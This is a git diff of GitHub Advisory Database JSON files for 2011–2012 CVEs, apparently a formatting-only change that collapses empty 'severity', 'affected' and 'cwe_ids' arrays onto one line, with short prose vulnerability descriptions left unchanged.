b/advisories/unreviewed/2022/05/GHSA-764x-f594-rv3g/GHSA-764x-f594-rv3g.json @@ -7,12 +7,8 @@ "CVE-2012-1465" ], "details": "Stack-based buffer overflow in the HTTP Server in NetMechanica NetDecision before 4.6.1 allows remote attackers to cause a denial of service (application crash) via a long URL in an HTTP request. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7765-xqg7-xm5q/GHSA-7765-xqg7-xm5q.json b/advisories/unreviewed/2022/05/GHSA-7765-xqg7-xm5q/GHSA-7765-xqg7-xm5q.json index ee180501d68..b978a84b5d5 100644 --- a/advisories/unreviewed/2022/05/GHSA-7765-xqg7-xm5q/GHSA-7765-xqg7-xm5q.json +++ b/advisories/unreviewed/2022/05/GHSA-7765-xqg7-xm5q/GHSA-7765-xqg7-xm5q.json @@ -7,12 +7,8 @@ "CVE-2012-2706" ], "details": "Cross-site scripting (XSS) vulnerability in the Post Affiliate Pro (PAP) module for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to user registration.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7794-cp73-4vx3/GHSA-7794-cp73-4vx3.json b/advisories/unreviewed/2022/05/GHSA-7794-cp73-4vx3/GHSA-7794-cp73-4vx3.json index 2e63cc274d8..ebd27216a13 100644 --- a/advisories/unreviewed/2022/05/GHSA-7794-cp73-4vx3/GHSA-7794-cp73-4vx3.json +++ b/advisories/unreviewed/2022/05/GHSA-7794-cp73-4vx3/GHSA-7794-cp73-4vx3.json @@ -7,12 +7,8 @@ "CVE-2012-1079" ], "details": "Unspecified vulnerability in the Webservices for TYPO3 (typo3_webservice) extension before 0.3.8 for TYPO3 allows remote authenticated users to execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-784q-3wpw-gfhc/GHSA-784q-3wpw-gfhc.json b/advisories/unreviewed/2022/05/GHSA-784q-3wpw-gfhc/GHSA-784q-3wpw-gfhc.json index 1a3ade967df..2be653e1f10 100644 --- a/advisories/unreviewed/2022/05/GHSA-784q-3wpw-gfhc/GHSA-784q-3wpw-gfhc.json +++ b/advisories/unreviewed/2022/05/GHSA-784q-3wpw-gfhc/GHSA-784q-3wpw-gfhc.json @@ -7,12 +7,8 @@ "CVE-2012-2710" ], "details": "Cross-site scripting (XSS) vulnerability in the Zen module 6.x-1.x before 6.x-1.1 for Drupal, when \"Append the content title to the end of the breadcrumb\" is enabled, allows remote attackers to inject arbitrary web script or HTML via the content title in a breadcrumb.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-78gp-c2rq-6jhr/GHSA-78gp-c2rq-6jhr.json b/advisories/unreviewed/2022/05/GHSA-78gp-c2rq-6jhr/GHSA-78gp-c2rq-6jhr.json index 8381cfb347b..423c50e8cd2 100644 --- a/advisories/unreviewed/2022/05/GHSA-78gp-c2rq-6jhr/GHSA-78gp-c2rq-6jhr.json +++ b/advisories/unreviewed/2022/05/GHSA-78gp-c2rq-6jhr/GHSA-78gp-c2rq-6jhr.json @@ -7,12 +7,8 @@ "CVE-2012-2672" ], "details": "Oracle Mojarra 2.1.7 does not properly \"clean up\" the FacesContext reference during startup, which allows local users to obtain context information an access resources from another WAR file by calling the FacesContext.getCurrentInstance function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-78mp-rgcx-c47v/GHSA-78mp-rgcx-c47v.json b/advisories/unreviewed/2022/05/GHSA-78mp-rgcx-c47v/GHSA-78mp-rgcx-c47v.json index 7ba7269796f..419b992c158 100644 --- a/advisories/unreviewed/2022/05/GHSA-78mp-rgcx-c47v/GHSA-78mp-rgcx-c47v.json +++ b/advisories/unreviewed/2022/05/GHSA-78mp-rgcx-c47v/GHSA-78mp-rgcx-c47v.json @@ -7,12 +7,8 @@ "CVE-2012-2730" ], "details": "The Protected Node module 6.x-1.x before 6.x-1.6 for Drupal does not properly \"protect node access when nodes are accessed outside of the standard node view,\" which allows remote attackers to bypass intended access restrictions.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7985-8hqh-8j5p/GHSA-7985-8hqh-8j5p.json b/advisories/unreviewed/2022/05/GHSA-7985-8hqh-8j5p/GHSA-7985-8hqh-8j5p.json index 83ff23fbe27..7457e616ec8 100644 --- a/advisories/unreviewed/2022/05/GHSA-7985-8hqh-8j5p/GHSA-7985-8hqh-8j5p.json +++ b/advisories/unreviewed/2022/05/GHSA-7985-8hqh-8j5p/GHSA-7985-8hqh-8j5p.json @@ -7,12 +7,8 @@ "CVE-2012-1022" ], "details": "SQL injection vulnerability in admin/categories.php in 4images 1.7.10 remote attackers to execute arbitrary SQL commands via the cat_parent_id parameter in an addcat action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-79xx-9qmj-6mhv/GHSA-79xx-9qmj-6mhv.json b/advisories/unreviewed/2022/05/GHSA-79xx-9qmj-6mhv/GHSA-79xx-9qmj-6mhv.json index c4ffcc471fd..4d8e288ef08 100644 --- a/advisories/unreviewed/2022/05/GHSA-79xx-9qmj-6mhv/GHSA-79xx-9qmj-6mhv.json +++ b/advisories/unreviewed/2022/05/GHSA-79xx-9qmj-6mhv/GHSA-79xx-9qmj-6mhv.json @@ -7,12 +7,8 @@ "CVE-2012-2162" ], "details": "The Web Server Plug-in in IBM WebSphere Application Server (WAS) 8.0 and earlier uses unencrypted HTTP communication after expiration of the plugin-key.kdb password, which allows remote attackers to obtain sensitive information by sniffing the network, or spoof arbitrary servers via a man-in-the-middle attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7c8v-gc52-cfg7/GHSA-7c8v-gc52-cfg7.json b/advisories/unreviewed/2022/05/GHSA-7c8v-gc52-cfg7/GHSA-7c8v-gc52-cfg7.json index e387ec457f0..1e2fcf160cb 100644 --- a/advisories/unreviewed/2022/05/GHSA-7c8v-gc52-cfg7/GHSA-7c8v-gc52-cfg7.json +++ b/advisories/unreviewed/2022/05/GHSA-7c8v-gc52-cfg7/GHSA-7c8v-gc52-cfg7.json @@ -7,12 +7,8 @@ "CVE-2012-2904" ], "details": "player.swf in LongTail JW Player 5.9 allows remote attackers to conduct cross-site scripting (XSS) attacks to inject arbitrary web script or HTML via multiple \"javascript:\" sequences in the debug parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7fhj-rrpr-r2cg/GHSA-7fhj-rrpr-r2cg.json b/advisories/unreviewed/2022/05/GHSA-7fhj-rrpr-r2cg/GHSA-7fhj-rrpr-r2cg.json index a4327296e14..5e8bead8003 100644 --- a/advisories/unreviewed/2022/05/GHSA-7fhj-rrpr-r2cg/GHSA-7fhj-rrpr-r2cg.json +++ b/advisories/unreviewed/2022/05/GHSA-7fhj-rrpr-r2cg/GHSA-7fhj-rrpr-r2cg.json @@ -7,12 +7,8 @@ "CVE-2012-4033" ], "details": "Multiple unspecified vulnerabilities in the Zingiri Web Shop plugin before 2.4.0 for WordPress have unknown impact and attack vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7fmx-9c6x-xx9j/GHSA-7fmx-9c6x-xx9j.json b/advisories/unreviewed/2022/05/GHSA-7fmx-9c6x-xx9j/GHSA-7fmx-9c6x-xx9j.json index 0b252838b05..e9646f6737f 100644 --- a/advisories/unreviewed/2022/05/GHSA-7fmx-9c6x-xx9j/GHSA-7fmx-9c6x-xx9j.json +++ b/advisories/unreviewed/2022/05/GHSA-7fmx-9c6x-xx9j/GHSA-7fmx-9c6x-xx9j.json @@ -7,12 +7,8 @@ "CVE-2011-5215" ], "details": "SQL injection vulnerability in index.php in Video Community Portal allows remote attackers to execute arbitrary SQL commands via the id parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7fvc-5qxg-jmg7/GHSA-7fvc-5qxg-jmg7.json b/advisories/unreviewed/2022/05/GHSA-7fvc-5qxg-jmg7/GHSA-7fvc-5qxg-jmg7.json index aad741c92b7..1dd2c1b9988 100644 --- a/advisories/unreviewed/2022/05/GHSA-7fvc-5qxg-jmg7/GHSA-7fvc-5qxg-jmg7.json +++ b/advisories/unreviewed/2022/05/GHSA-7fvc-5qxg-jmg7/GHSA-7fvc-5qxg-jmg7.json @@ -7,12 +7,8 @@ "CVE-2012-2569" ], "details": "Cross-site scripting (XSS) vulnerability in Synametrics Technologies Xeams 4.4 Build 5720 allows remote attackers to inject arbitrary web script or HTML via the body of an email.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7g3v-77m8-vx32/GHSA-7g3v-77m8-vx32.json b/advisories/unreviewed/2022/05/GHSA-7g3v-77m8-vx32/GHSA-7g3v-77m8-vx32.json index e1353d6f7e7..5fd656d93fa 100644 --- a/advisories/unreviewed/2022/05/GHSA-7g3v-77m8-vx32/GHSA-7g3v-77m8-vx32.json +++ b/advisories/unreviewed/2022/05/GHSA-7g3v-77m8-vx32/GHSA-7g3v-77m8-vx32.json @@ -7,12 +7,8 @@ "CVE-2012-3846" ], "details": "Cross-site scripting (XSS) vulnerability in index.php in PHP-pastebin 2.1 allows remote attackers to inject arbitrary web script or HTML via the title parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7g4j-cqwh-2jf3/GHSA-7g4j-cqwh-2jf3.json b/advisories/unreviewed/2022/05/GHSA-7g4j-cqwh-2jf3/GHSA-7g4j-cqwh-2jf3.json index e251e058e1a..d13bba55a2a 100644 --- a/advisories/unreviewed/2022/05/GHSA-7g4j-cqwh-2jf3/GHSA-7g4j-cqwh-2jf3.json +++ b/advisories/unreviewed/2022/05/GHSA-7g4j-cqwh-2jf3/GHSA-7g4j-cqwh-2jf3.json @@ -7,12 +7,8 @@ "CVE-2012-2154" ], "details": "Cross-site scripting (XSS) vulnerability in the CDN2 Video module 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7g5w-29m5-qfmq/GHSA-7g5w-29m5-qfmq.json b/advisories/unreviewed/2022/05/GHSA-7g5w-29m5-qfmq/GHSA-7g5w-29m5-qfmq.json index f35302adac8..e86a84c8379 100644 --- a/advisories/unreviewed/2022/05/GHSA-7g5w-29m5-qfmq/GHSA-7g5w-29m5-qfmq.json +++ b/advisories/unreviewed/2022/05/GHSA-7g5w-29m5-qfmq/GHSA-7g5w-29m5-qfmq.json @@ -7,12 +7,8 @@ "CVE-2012-2588" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in MailEnable Enterprise 6.5 allow remote attackers to inject arbitrary web script or HTML via the (1) From, (2) To, or (3) Subject header or (4) body in an SMTP e-mail message.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7gqj-8g2q-xjjx/GHSA-7gqj-8g2q-xjjx.json b/advisories/unreviewed/2022/05/GHSA-7gqj-8g2q-xjjx/GHSA-7gqj-8g2q-xjjx.json index 90bcadb233c..04989f656b2 100644 --- a/advisories/unreviewed/2022/05/GHSA-7gqj-8g2q-xjjx/GHSA-7gqj-8g2q-xjjx.json +++ b/advisories/unreviewed/2022/05/GHSA-7gqj-8g2q-xjjx/GHSA-7gqj-8g2q-xjjx.json @@ -7,12 +7,8 @@ "CVE-2012-2748" ], "details": "Unspecified vulnerability in Joomla! 2.5.x before 2.5.5 allows remote attackers to obtain sensitive information via vectors related to \"Inadequate filtering\" and a \"SQL error.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7gv4-fw33-jqcg/GHSA-7gv4-fw33-jqcg.json b/advisories/unreviewed/2022/05/GHSA-7gv4-fw33-jqcg/GHSA-7gv4-fw33-jqcg.json index 630c4c30b80..f00c57c3633 100644 --- a/advisories/unreviewed/2022/05/GHSA-7gv4-fw33-jqcg/GHSA-7gv4-fw33-jqcg.json +++ b/advisories/unreviewed/2022/05/GHSA-7gv4-fw33-jqcg/GHSA-7gv4-fw33-jqcg.json @@ -7,12 +7,8 @@ "CVE-2012-2759" ], "details": "Cross-site scripting (XSS) vulnerability in login-with-ajax.php in the Login With Ajax (aka login-with-ajax) plugin before 3.0.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the callback parameter in a lostpassword action to wp-login.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7gv8-6v3x-g279/GHSA-7gv8-6v3x-g279.json b/advisories/unreviewed/2022/05/GHSA-7gv8-6v3x-g279/GHSA-7gv8-6v3x-g279.json index d75466ad089..410f70a6664 100644 --- a/advisories/unreviewed/2022/05/GHSA-7gv8-6v3x-g279/GHSA-7gv8-6v3x-g279.json +++ b/advisories/unreviewed/2022/05/GHSA-7gv8-6v3x-g279/GHSA-7gv8-6v3x-g279.json @@ -7,12 +7,8 @@ "CVE-2012-2723" ], "details": "Cross-site scripting (XSS) vulnerability in the Maestro module 7.x-1.x before 7.x-1.2 for Drupal allows remote authenticated users with maestro admin permissions to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7j2w-r9hq-qch3/GHSA-7j2w-r9hq-qch3.json b/advisories/unreviewed/2022/05/GHSA-7j2w-r9hq-qch3/GHSA-7j2w-r9hq-qch3.json index 80b35be9e28..7c04d68ed0c 100644 --- a/advisories/unreviewed/2022/05/GHSA-7j2w-r9hq-qch3/GHSA-7j2w-r9hq-qch3.json +++ b/advisories/unreviewed/2022/05/GHSA-7j2w-r9hq-qch3/GHSA-7j2w-r9hq-qch3.json @@ -7,12 +7,8 @@ "CVE-2012-2725" ], "details": "classes/Filter/WhitelistedExternalFilter.php in the Authoring HTML module 6.x-1.x before 6.x-1.1 for Drupal does not properly validate sources with the host white list, which allows remote authenticated users to bypass intended access restrictions and conduct cross-site scripting (XSS) attacks.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7jv3-hcrw-wvcq/GHSA-7jv3-hcrw-wvcq.json b/advisories/unreviewed/2022/05/GHSA-7jv3-hcrw-wvcq/GHSA-7jv3-hcrw-wvcq.json index f0639dc5cb9..6c8b4387de8 100644 --- a/advisories/unreviewed/2022/05/GHSA-7jv3-hcrw-wvcq/GHSA-7jv3-hcrw-wvcq.json +++ b/advisories/unreviewed/2022/05/GHSA-7jv3-hcrw-wvcq/GHSA-7jv3-hcrw-wvcq.json @@ -7,12 +7,8 @@ "CVE-2012-2093" ], "details": "src/common/latex.py in Gajim 0.15 allows local users to overwrite arbitrary files via a symlink attack on a temporary latex file, related to the get_tmpfile_name function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7m32-f887-xfh8/GHSA-7m32-f887-xfh8.json b/advisories/unreviewed/2022/05/GHSA-7m32-f887-xfh8/GHSA-7m32-f887-xfh8.json index 72e3a02d49b..7132be1e525 100644 --- a/advisories/unreviewed/2022/05/GHSA-7m32-f887-xfh8/GHSA-7m32-f887-xfh8.json +++ b/advisories/unreviewed/2022/05/GHSA-7m32-f887-xfh8/GHSA-7m32-f887-xfh8.json @@ -7,12 +7,8 @@ "CVE-2011-5172" ], "details": "Stack-based buffer overflow in StoryBoard Quick 6 Build 3786, and possibly StoryBoard Artist and StoryBoard Studio, allows remote attackers to execute arbitrary code via a long string in the string element field in a frame xml file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7mp8-94mg-r4v3/GHSA-7mp8-94mg-r4v3.json b/advisories/unreviewed/2022/05/GHSA-7mp8-94mg-r4v3/GHSA-7mp8-94mg-r4v3.json index f592c53fdc3..3619586eb93 100644 --- a/advisories/unreviewed/2022/05/GHSA-7mp8-94mg-r4v3/GHSA-7mp8-94mg-r4v3.json +++ b/advisories/unreviewed/2022/05/GHSA-7mp8-94mg-r4v3/GHSA-7mp8-94mg-r4v3.json @@ -7,12 +7,8 @@ "CVE-2012-1057" ], "details": "Cross-site request forgery (CSRF) vulnerability in the clickthrough tracking functionality in the Forward module 6.x-1.x before 6.x-1.21 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to hijack the authentication of administrators for requests that increase node rankings via the tracking code, possibly related to improper \"flood control.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7mvg-3f28-p6ww/GHSA-7mvg-3f28-p6ww.json b/advisories/unreviewed/2022/05/GHSA-7mvg-3f28-p6ww/GHSA-7mvg-3f28-p6ww.json index 6d1bb19cbac..b4284f33fa2 100644 --- a/advisories/unreviewed/2022/05/GHSA-7mvg-3f28-p6ww/GHSA-7mvg-3f28-p6ww.json +++ b/advisories/unreviewed/2022/05/GHSA-7mvg-3f28-p6ww/GHSA-7mvg-3f28-p6ww.json @@ -7,12 +7,8 @@ "CVE-2012-2924" ], "details": "PHP remote file inclusion vulnerability in admin/setup.inc.php in Hypermethod eLearning Server 4G allows remote attackers to execute arbitrary PHP code via a URL in the path parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7p37-jwcq-c522/GHSA-7p37-jwcq-c522.json b/advisories/unreviewed/2022/05/GHSA-7p37-jwcq-c522/GHSA-7p37-jwcq-c522.json index 3a8bbdf2bcf..b5b0382676d 100644 --- a/advisories/unreviewed/2022/05/GHSA-7p37-jwcq-c522/GHSA-7p37-jwcq-c522.json +++ b/advisories/unreviewed/2022/05/GHSA-7p37-jwcq-c522/GHSA-7p37-jwcq-c522.json @@ -7,12 +7,8 @@ "CVE-2012-3935" ], "details": "Cisco Unified Presence (CUP) before 8.6(3) and Jabber Extensible Communications Platform (aka Jabber XCP) before 5.3 allow remote attackers to cause a denial of service (process crash) via a crafted XMPP stream header, aka Bug ID CSCtu32832.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7p5j-5f93-4m6j/GHSA-7p5j-5f93-4m6j.json b/advisories/unreviewed/2022/05/GHSA-7p5j-5f93-4m6j/GHSA-7p5j-5f93-4m6j.json index 4b5cecb4861..7130e571dd8 100644 --- a/advisories/unreviewed/2022/05/GHSA-7p5j-5f93-4m6j/GHSA-7p5j-5f93-4m6j.json +++ b/advisories/unreviewed/2022/05/GHSA-7p5j-5f93-4m6j/GHSA-7p5j-5f93-4m6j.json @@ -7,12 +7,8 @@ "CVE-2012-2084" ], "details": "Cross-site scripting (XSS) vulnerability in the Printer, email and PDF versions module 6.x-1.x before 6.x-1.15 and 7.x-1.x before 7.x-1.0 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably the PATH_INFO.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7ppg-m8wv-4c2q/GHSA-7ppg-m8wv-4c2q.json b/advisories/unreviewed/2022/05/GHSA-7ppg-m8wv-4c2q/GHSA-7ppg-m8wv-4c2q.json index 81a9b97fe28..574ef2c5210 100644 --- a/advisories/unreviewed/2022/05/GHSA-7ppg-m8wv-4c2q/GHSA-7ppg-m8wv-4c2q.json +++ b/advisories/unreviewed/2022/05/GHSA-7ppg-m8wv-4c2q/GHSA-7ppg-m8wv-4c2q.json @@ -7,12 +7,8 @@ "CVE-2012-0977" ], "details": "Stack-based buffer overflow in jp2_x.dll in LuraWave JP2 ActiveX Control 2.1.5.5 and other versions before 2.1.5.11 allows remote attackers to execute arbitrary code via a JPEG2000 (JP2) file with a crafted Quantization Default (QCD) marker segment.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7qfx-rm3x-wjcq/GHSA-7qfx-rm3x-wjcq.json b/advisories/unreviewed/2022/05/GHSA-7qfx-rm3x-wjcq/GHSA-7qfx-rm3x-wjcq.json index 8306c187fd9..4aaf5953ce2 100644 --- a/advisories/unreviewed/2022/05/GHSA-7qfx-rm3x-wjcq/GHSA-7qfx-rm3x-wjcq.json +++ b/advisories/unreviewed/2022/05/GHSA-7qfx-rm3x-wjcq/GHSA-7qfx-rm3x-wjcq.json @@ -7,12 +7,8 @@ "CVE-2012-3580" ], "details": "Symantec Messaging Gateway (SMG) before 10.0 allows remote authenticated users to modify the web application by leveraging access to the management interface.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7qhx-r6vc-f8xm/GHSA-7qhx-r6vc-f8xm.json b/advisories/unreviewed/2022/05/GHSA-7qhx-r6vc-f8xm/GHSA-7qhx-r6vc-f8xm.json index 1ac6171509e..3cb1c71f473 100644 --- a/advisories/unreviewed/2022/05/GHSA-7qhx-r6vc-f8xm/GHSA-7qhx-r6vc-f8xm.json +++ b/advisories/unreviewed/2022/05/GHSA-7qhx-r6vc-f8xm/GHSA-7qhx-r6vc-f8xm.json @@ -7,12 +7,8 @@ "CVE-2012-3316" ], "details": "Cross-site scripting (XSS) vulnerability in the Tivoli Process Automation Engine (TPAE) in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7rx8-fqcc-2mqg/GHSA-7rx8-fqcc-2mqg.json b/advisories/unreviewed/2022/05/GHSA-7rx8-fqcc-2mqg/GHSA-7rx8-fqcc-2mqg.json index 22e979d6410..0d38c252306 100644 --- a/advisories/unreviewed/2022/05/GHSA-7rx8-fqcc-2mqg/GHSA-7rx8-fqcc-2mqg.json +++ b/advisories/unreviewed/2022/05/GHSA-7rx8-fqcc-2mqg/GHSA-7rx8-fqcc-2mqg.json @@ -7,12 +7,8 @@ "CVE-2012-0914" ], "details": "Cross-site scripting (XSS) vulnerability in display_renderers/panels_renderer_editor.class.php in the admin view in the Panels module 6.x-2.x before 6.x-3.10 and 7.x-3.x before 7.x-3.0 for Drupal allows remote authenticated users with certain privileges to inject arbitrary web script or HTML via the Region title.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7wh8-gg39-jghh/GHSA-7wh8-gg39-jghh.json b/advisories/unreviewed/2022/05/GHSA-7wh8-gg39-jghh/GHSA-7wh8-gg39-jghh.json index cc2e9abe72e..527ce15eb73 100644 --- a/advisories/unreviewed/2022/05/GHSA-7wh8-gg39-jghh/GHSA-7wh8-gg39-jghh.json +++ b/advisories/unreviewed/2022/05/GHSA-7wh8-gg39-jghh/GHSA-7wh8-gg39-jghh.json @@ -7,12 +7,8 @@ "CVE-2011-5221" ], "details": "Cross-site scripting (XSS) vulnerability in the getLog function in svnlook.php in WebSVN before 2.3.1 allows remote attackers to inject arbitrary web script or HTML via the path parameter to (1) comp.php, (2) diff.php, or (3) revision.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7x96-xj2v-4h8r/GHSA-7x96-xj2v-4h8r.json b/advisories/unreviewed/2022/05/GHSA-7x96-xj2v-4h8r/GHSA-7x96-xj2v-4h8r.json index 502f6a2c3a2..a4914295f53 100644 --- a/advisories/unreviewed/2022/05/GHSA-7x96-xj2v-4h8r/GHSA-7x96-xj2v-4h8r.json +++ b/advisories/unreviewed/2022/05/GHSA-7x96-xj2v-4h8r/GHSA-7x96-xj2v-4h8r.json @@ -7,12 +7,8 @@ "CVE-2012-4058" ], "details": "Cross-site scripting (XSS) vulnerability in SocketMail Pro 2.2.9 allows remote attackers to inject arbitrary web script or HTML via the subject of an email.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7xq8-8r52-qr48/GHSA-7xq8-8r52-qr48.json b/advisories/unreviewed/2022/05/GHSA-7xq8-8r52-qr48/GHSA-7xq8-8r52-qr48.json index 90509d1a1c1..a1908fa0163 100644 --- a/advisories/unreviewed/2022/05/GHSA-7xq8-8r52-qr48/GHSA-7xq8-8r52-qr48.json +++ b/advisories/unreviewed/2022/05/GHSA-7xq8-8r52-qr48/GHSA-7xq8-8r52-qr48.json @@ -7,12 +7,8 @@ "CVE-2012-1220" ], "details": "Cross-site request forgery (CSRF) vulnerability in modules/config/admin_utente.php in GAzie 5.20 and earlier allows remote attackers to hijack the authentication of administrators for requests that change account information via an update action, as demonstrated by changing the password.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7xrq-f64r-6mhm/GHSA-7xrq-f64r-6mhm.json b/advisories/unreviewed/2022/05/GHSA-7xrq-f64r-6mhm/GHSA-7xrq-f64r-6mhm.json index cb1e535bc6e..9ed409d0ae8 100644 --- a/advisories/unreviewed/2022/05/GHSA-7xrq-f64r-6mhm/GHSA-7xrq-f64r-6mhm.json +++ b/advisories/unreviewed/2022/05/GHSA-7xrq-f64r-6mhm/GHSA-7xrq-f64r-6mhm.json @@ -7,12 +7,8 @@ "CVE-2012-0697" ], "details": "HP StorageWorks P2000 G3 MSA array systems have a default account, which makes it easier for remote attackers to perform administrative tasks via unspecified vectors, a different vulnerability than CVE-2011-4788.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-82qw-gwpw-p58g/GHSA-82qw-gwpw-p58g.json b/advisories/unreviewed/2022/05/GHSA-82qw-gwpw-p58g/GHSA-82qw-gwpw-p58g.json index c71b1ee1d4b..f89256e52f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-82qw-gwpw-p58g/GHSA-82qw-gwpw-p58g.json +++ b/advisories/unreviewed/2022/05/GHSA-82qw-gwpw-p58g/GHSA-82qw-gwpw-p58g.json @@ -7,12 +7,8 @@ "CVE-2012-1731" ], "details": "Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect 